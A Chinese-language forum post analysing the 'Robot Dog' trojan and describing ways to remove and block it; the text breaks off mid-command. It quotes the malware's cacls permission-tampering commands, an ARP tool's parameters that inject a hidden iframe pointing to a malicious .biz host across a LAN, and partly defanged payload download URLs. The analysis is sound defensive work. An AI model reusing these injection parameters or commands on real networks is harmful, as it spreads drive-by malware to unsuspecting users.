徹底清除機器狗木馬的方法
器狗木馬有10多個變種!
%Temp%釋放隨機命名的P處理,建立pcihdd.sys資料夾
本身並不判斷檔案系統,直接P處理,保證pcihdd.sys、userinit.exe不被NTFS檔案系統的許可權控制:
Parent process:
Path: C:WINNTsystem32CMD.EXE
PID: 468
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:WINNTsystem32cacls.exe
Information: Control ACLs Program (Microsoft Corporation)
Command line:cacls C:winntsystem32driverspcihdd.sys /e /p everyone:n
Parent process:
Path: C:WINNTsystem32CMD.EXE
PID: 468
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:WINNTsystem32cacls.exe
Information: Control ACLs Program (Microsoft Corporation)
Command line:cacls C:winntsystem32userinit.exe /e /p everyone:r
然後釋放病毒檔pvc.exe,於192.168.0.1-192.168.0.254網段
加入框架(病毒)資料包,參數為:
-idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src=’hXXp://xxx.mmma.biz/js.htm’ width=0 height=0></iframe>"
病毒行為:
去除pcihdd.sys的檔案屬性,並刪除原有的pcihdd.sys資料夾。
然後繼續下載:
h**p://xx*.XXXXX.biz/big.exe
h**p://xx*.XXXX.biz/big1.exe
哈哈,自始至終終於見到機器狗了(big.exe)
第2個是上面分析過的ARP病毒,哈哈``54ing``刪掉
再看看那個機器狗,哈``首先檢測pcihdd.sys是否存在。
若不在則註冊該驅動,然後判斷條件,如果滿足以下條件則退出,不做其他操作:
1、不是開機磁碟分割,比如說雙系統。
2、檔案系統,哈哈``不會是針對FAT16的吧
3、如果是NTFS,使用了檔案壓縮功能,可能導致病毒驅動在計算Userinnt位址時會出現錯誤?
4、讀取Userinnt失敗(設置許可權),這個版本的小狗應該還不至於出現這情況。
如果沒有意外,則pcihdd.sys訪問磁片底層,讀取%SystemRoot%System32Userinit.exe
並修改。(應該會穿過一些還原類的東東`)
我測試被HIPS自動拒絕,所以。。。。>_<
能不能穿透影子還不知道。
被修改後的Userinit.exe,重啟系統後聯網下載東東:
至於解決方法,基本有這幾條思路:
1、殺軟或HIPS禁止其運行。(對個人PC比較實用)
2、許可權設置,禁止修改Userinit.exe和創建pcihdd.sys。(看起來比較渺茫``HIPS的FD可以)
3、路由或防火牆那裡把hXXp://xxx.mmma.biz遮罩了
4、註冊表許可權,這個比較簡單,網吧或局域環境的,操作起來不會太難:
我的是2K系統,比較麻煩```:
開始-運行-regedt32(XP系統不用,直接運行regedit就可以!)
在HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices (系統服務)
建立個名為PciHdd的空鍵,然後上許可權,system和管理員許可權的都要設置。
如果已經有了PciHdd,不用刪它,設置為禁止控制和讀取 ^_^
5、最後一個比較推薦:
CMD
cd ……到drivers
md pcihdd.sys
cd pcihdd.sys
md 1... |